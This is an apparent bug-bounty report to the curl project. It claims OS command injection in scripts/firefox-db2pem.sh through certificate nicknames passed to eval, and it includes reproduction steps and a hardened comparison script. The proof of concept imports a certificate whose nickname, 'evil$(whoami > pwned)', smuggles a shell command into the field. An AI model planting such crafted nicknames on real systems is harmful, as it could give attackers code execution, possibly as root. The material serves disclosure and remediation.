OS Command Injection in scripts/firefox-db2pem.sh via untrusted certificate nicknames
Severity: High
Program: curl
Reported by behindtheblackwall
Vulnerability Details
On AI usage: Only for grammar/formatting suggestions/POC code troubleshooting; all vulnerability discovery, POC code creation, and analysis were done manually.
Hey folks, I noticed something I think is worth bringing to you: the scripts/firefox-db2pem.sh helper in the curl source uses
`eval certutil -d "$db" -L -n "$nickname" -a`
to extract each certificate by nickname. Because eval re-parses its arguments, a malicious nickname containing shell syntax (e.g. `$(whoami > pwned)`) is executed on the host.
Affected Version
- curl master as of June 26 2025 (commit 2a9dfe2); not sure how long this vuln has been in for, though.
Steps To Reproduce
1. Install prerequisites
   `sudo apt-get install -y libnss3-tools openssl`
2. Create a throw-away profile
   ```sh
   export HOME=$(mktemp -d)
   PROF="$HOME/.mozilla/firefox/safe.default"
   mkdir -p "$PROF"
   certutil -N --empty-password -d "$PROF"
   ```
3. Generate a self-signed cert
   ```sh
   openssl req -x509 -newkey rsa:2048 -nodes \
     -subj '/CN=RCE-Test/' -days 1 \
     -keyout "$HOME/key.pem" -out "$HOME/cert.pem"
   ```
4. Import it with a malicious nickname that runs whoami
   ```sh
   payload='evil$(whoami > pwned)'
   certutil -A -d "$PROF" -n "$payload" -t "C,C,C" -i "$HOME/cert.pem"
   ```
5. Verify the nickname is listed
   `certutil -L -h 'Builtin Object Token' -d "$PROF"`
6. Run the vulnerable helper
   `bash -x scripts/firefox-db2pem.sh "$HOME/ca-bundle.pem" || true`
7. Observe proof file
   `cat pwned`
You can also just use my POC script below, which I'll attach, but it's basically just those steps automated.
Supporting Material / References
Vulnerable code snippet in scripts/firefox-db2pem.sh:
```sh
certutil -L -h 'Builtin Object Token' -d "$db" | \
grep ' *[CcGTPpu]*,[CcGTPpu]*,[CcGTPpu]* *$' | \
sed -e 's/ *[CcGTPpu]*,[CcGTPpu]*,[CcGTPpu]* *$//' -e 's/\(.*\)/"\1"/' | \
sort | \
while read -r nickname; \
do echo "$nickname" | sed -e "s/Builtin Object Token://g"; \
eval certutil -d "$db" -L -n "$nickname" -a ; \
done >> "$out"
```
Because the nickname value is substituted into the string that eval executes, any shell metacharacters or command sequences in a nickname will run as part of the shell command.
## Impact
An attacker who can import a certificate into any Firefox NSS database—e.g., their own profile—can achieve arbitrary code execution when scripts/firefox-db2pem.sh is run. In practice, many administrators run this helper as root to generate a system-wide CA bundle, so this bug yields root-level RCE on affected systems.
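The eval re-parsing described above, shown beside the hardened form that hands the nickname to certutil as a plain argument (an added example, not the report's PoC or curl's own code). certutil is replaced by a stub function that echoes back the nickname it receives, and the database path and nickname are constructed inputs.

```shell
#!/bin/sh
# Added example, not code from the report or from curl's script.
# certutil(1) is replaced by a stub so this runs offline; the nickname and
# database path below are constructed inputs.

# Stub standing in for certutil: prints the argument that follows -n, i.e.
# the nickname the real tool would look up, so we can see what it received.
certutil() {
    while [ $# -gt 0 ]; do
        if [ "$1" = "-n" ]; then
            printf '%s\n' "$2"
            return 0
        fi
        shift
    done
    return 1
}

# The pattern from scripts/firefox-db2pem.sh: the sed stage wraps each
# nickname in literal double quotes (so it survives word splitting), and
# eval then re-parses the assembled command line, so $(...), backticks or ;
# inside the nickname are interpreted as shell syntax rather than data.
extract_with_eval() {
    db=$1
    nickname="\"$2\""
    eval certutil -d "$db" -L -n "$nickname" -a
}

# Hardened form: drop the quote-wrapping sed expression and the eval. The
# nickname reaches certutil as a single argv element, so spaces are kept
# and metacharacters are never interpreted.
extract_without_eval() {
    db=$1
    nickname=$2
    certutil -d "$db" -L -n "$nickname" -a
}

# Constructed nickname carrying a harmless command substitution.
demo_nickname='evil$(echo INJECTED)'

# With eval the substitution runs and certutil sees "evilINJECTED";
# without eval certutil sees the literal string, substitution and all.
extract_with_eval /tmp/demo-db "$demo_nickname"
extract_without_eval /tmp/demo-db "$demo_nickname"
```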
Report Details
State: Closed
Substate: Informative
Weakness: OS Command Injection